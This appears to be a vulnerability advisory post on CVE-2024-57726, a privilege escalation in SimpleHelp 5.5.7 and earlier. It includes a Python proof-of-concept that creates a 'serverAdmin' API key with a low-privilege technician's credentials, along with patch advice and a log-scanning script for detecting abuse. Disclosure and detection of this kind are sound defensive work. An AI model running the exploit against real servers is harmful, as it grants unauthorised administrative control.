Attention SimpleHelp users! If you're using SimpleHelp remote support software version 5.5.7 or earlier, it's time to update. A recently discovered vulnerability, tracked as CVE-2024-57726, allows low-privilege technicians to escalate their privileges to server admin level by creating API keys with excessive permissions. This post covers the details of this vulnerability, shares a code snippet illustrating the exploit, and provides links to the original references for those who require more information.
Vulnerability Details
SimpleHelp is a remote desktop support solution that allows technicians to provide remote assistance to end-users. In versions 5.5.7 and earlier, a security vulnerability allows low-privilege technicians to create API keys with excessive permissions. These keys can then be used to escalate the technician's privileges to the server admin role, potentially allowing them to perform malicious actions such as accessing sensitive data, modifying configurations, or even causing denial of service.
Exploit Details
To exploit this vulnerability, a low-privilege technician first needs access to the SimpleHelp server. Once they have access, they can craft an HTTP request to create an API key with excessive permissions.
Here's a code snippet demonstrating this exploit:
    import requests

    url = "https://example.simple-help.com/api/xml?action=create_api_key"
    headers = {
        "Authorization": "Basic dGVzdC91c2VyOnRlc3RwYXNz",  # Replace with base64-encoded credentials
        "Content-Type": "application/x-www-form-urlencoded",
    }
    data = {
        "name": "Exploit Key",
        "permissions": "serverAdmin",
    }

    response = requests.post(url, headers=headers, data=data)
    if response.status_code == 200:
        print("API key creation successful!")
        print(response.content)
    else:
        print("API key creation failed. Error: ", response.status_code)

In this snippet, replace the example URL with the target SimpleHelp server's URL and use the base64-encoded credentials of the low-privilege technician account in the 'Authorization' header. The exploit will attempt to create an API key with 'serverAdmin' privileges. If successful, the API key creation response will contain the new API key with excessive permissions.
Mitigation
To prevent exploitation of this vulnerability, the recommended action is to update SimpleHelp to the latest version. According to the SimpleHelp release notes, this vulnerability has been patched in version 5.5.8:
> "5.5.8 - Fixed a privilege escalation vulnerability in the API that could be exploited to generate API credentials with higher-than-anticipated permissions."
You can download the latest version of SimpleHelp from their official website: https://simple-help.com/download
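For servers that ran 5.5.7 or earlier, it is also worth checking whether the key-creation action was requested before the update. The following is an added example, not code from the original post or from SimpleHelp: it assumes a reverse proxy in front of the server writes access logs in combined format, takes the `/api/xml?action=create_api_key` endpoint from the snippet above, and uses constructed sample log lines.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined log format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def is_vulnerable(version):
    """True for 5.5.7 and earlier (the release notes list the fix in 5.5.8)."""
    parts = tuple(int(p) for p in version.lstrip("v").split("."))
    return parts < (5, 5, 8)

def find_key_creation(lines):
    """Return every API-key creation request found in the access-log lines."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format entry
        target = urlsplit(m["target"])
        actions = parse_qs(target.query).get("action", [])
        if target.path == "/api/xml" and "create_api_key" in actions:
            # The POST body (requested permissions) is not logged, so every
            # hit needs review against the keys that exist on the server.
            hits.append({"ip": m["ip"], "user": m["user"], "time": m["time"],
                         "method": m["method"], "status": int(m["status"])})
    return hits

# Constructed sample lines; addresses, users and the second action are made up.
SAMPLE_LOG = [
    '203.0.113.7 - tech1 [15/Jan/2025:10:02:11 +0000] "GET /api/xml?action=example_other HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.7 - tech1 [15/Jan/2025:10:02:40 +0000] "POST /api/xml?action=create_api_key HTTP/1.1" 200 231 "-" "-"',
    '198.51.100.4 - - [15/Jan/2025:10:05:00 +0000] "POST /api/xml?action=create_api_key HTTP/1.1" 401 0 "-" "-"',
    'not an access log entry',
]

if __name__ == "__main__":
    print("5.5.7 vulnerable:", is_vulnerable("5.5.7"))
    for hit in find_key_creation(SAMPLE_LOG):
        flag = "REVIEW" if hit["status"] == 200 else "failed"
        print(f'{flag}: {hit["time"]} {hit["ip"]} user={hit["user"]} status={hit["status"]}')
```

Each successful hit should be matched against the API keys present on the server, and any key the technician was not entitled to create should be revoked.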
Original References
1. SimpleHelp Release Notes (see version 5.5.8 for the fix): https://simple-help.com/releases
2. CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-57726
In conclusion, if you're using SimpleHelp remote support software v5.5.7 or earlier, it's crucial to update your software to the latest version to mitigate the risk associated with CVE-2024-57726. By doing so, you can ensure the security of your remote support services and prevent unauthorized escalation of privileges.
Timeline
Published on: 01/15/2025 23:15:09 UTC
Last modified on: 01/31/2025 21:15:11 UTC